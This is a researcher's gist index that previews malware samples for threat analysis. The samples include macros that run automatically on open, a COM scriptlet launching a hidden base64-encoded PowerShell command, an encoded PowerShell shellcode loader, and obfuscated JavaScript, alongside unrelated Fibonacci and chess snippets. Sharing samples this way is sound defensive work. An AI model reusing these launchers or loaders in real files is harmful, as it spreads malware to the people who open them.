John Lambert JohnLaTwC
JohnLaTwC
/ 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29
Created
November 7, 2018 16:47
VBA XLS + Invoke-Obfuscation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded by @JohnLaTwC | |
| ## Sample hashes: 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29 | |
| eec6c63b87b4272a05433babad6da16c82956fe232652c4754b8d754ed036611 | |
| 2a6f540582d8761b9b3e41f9ea734f72726af969fb04742244267047d883ea78 | |
| olevba3 0.53.1 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| OLE:MASIHB-- 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29 | |
| =============================================================================== |
JohnLaTwC
/ b41a2cc5e2975e51b411305215a49d921b0fdf697d6e6d67ccb9bade99850e3c
Created
November 7, 2018 19:17
VBA + Invoke-Obfuscation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded by @JohnLaTwC | |
| ## Sample hash: b41a2cc5e2975e51b411305215a49d921b0fdf697d6e6d67ccb9bade99850e3c | |
| Sub Auto_Open() | |
| OMq | |
| End Sub | |
| Sub AutoOpen() | |
| OMq | |
| End Sub |
JohnLaTwC
/ 43cbbbf93121f3644ba26a273ebdb54d8827b25eb9c754d3631be395f06d8cff
Created
November 13, 2018 18:28
COM Scriptlet threat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcAB |
JohnLaTwC
/ 9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224
Created
January 27, 2019 17:09
VBA DOC Malware MSBuild Scheduled Task
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| ## Sample Hash: 9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224 | |
| ## Sample evolution: | |
| ## c2e126498e61d4dc4154b5721dfd9811cd1d8c84063477e271134f0ed30e29ea | |
| ## df7fc66bcceaf9b041fe839b5cda95dfad14c8475c6e2ec49dc23d5ae3ba62ac | |
| ## b621015caa6077d7e85807c7f1509f88d5560d3e4ef439f578edc43f7b01c071 | |
| ## 7d2bf283d12bc6914708e2a4240c2cefbd1871c3b4ac3c9b2a70ea7553fb7f4a | |
| ## 13fc853eb0e59b8133f93a3f55ed4086ffa8545aecef513f0bfe8363467fb110 | |
| ## 5e53334b062c7c908a7354c77343e7d356959727930f2557b5e65b936b2cd462 |
JohnLaTwC
/ star basic macro malware.txt
Created
February 7, 2019 17:22
StarBasic macro Malware (Uploaded by @JohnLaTwC)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded by @JohnLaTwC | |
| 25b4214da1189fd30d3de7c538aa8b606f22c79e50444e5733fb1c6d23d71fbe.unzip\Basic\Standard\Module1.xml | |
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd"> | |
| <script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">REM ***** BASIC ***** | |
| Sub OnLoad | |
| Dim os as string |
JohnLaTwC
/ f3d007663cdf582e296c6ff8e5c073698e9d20542c21c424ba5c551b9e92fe8e
Last active
February 12, 2019 21:23
JavaScript nested decode threat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| ## Sample hash: f3d007663cdf582e296c6ff8e5c073698e9d20542c21c424ba5c551b9e92fe8e | |
| function stive$s_s(ohaSoup, portuga$, chall$_ot, bit$est_e){ | |
| var u = bit$est_e; | |
| switch(u){ | |
| case 1: | |
| break; | |
| case bit$est_e: | |
| chall$_ot.Type = 1; | |
| chall$_ot.Open(); |
JohnLaTwC
/ 0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f
Created
February 13, 2019 16:53
shellcode disams
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| https://www.virustotal.com/en/file/0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f/analysis/ | |
| https://docs.microsoft.com/en-us/windows/desktop/api/wininet/nf-wininet-internetconnecta | |
| void InternetConnectA( | |
| HINTERNET hInternet, | |
| LPCSTR lpszServerName, | |
| INTERNET_PORT nServerPort, | |
| LPCSTR lpszUserName, | |
| LPCSTR lpszPassword, | |
| DWORD dwService, |
JohnLaTwC
/ 0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f
Created
February 13, 2019 18:20
PowerShell encoded threat with shellcode (dmkKi1TH.posh)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -w 1 -C "sv BY -;sv bK ec;sv Kq ((gv BY).value.toString()+(gv bK).value.toString());powershell (gv Kq).value.toString() 'JABkAEcASwAgAD0AIAAnACQAWgBtACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ULONG __declspec(naked) CalcFibMT5 (int dwFibNum) | |
| { | |
| // dwFibNum is passed at esp-4 | |
| // Result must be returned in eax | |
| __asm | |
| { | |
| // start pushing working registers ecx, ebx. eax is clobbered | |
| push ecx | |
| mov ecx, round_finish |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public class GregAlg : ChessAlg | |
| { | |
| public GregAlg() | |
| { | |
| } | |
| private string LowECode(Piece p) | |
| { | |
| string s = ""; |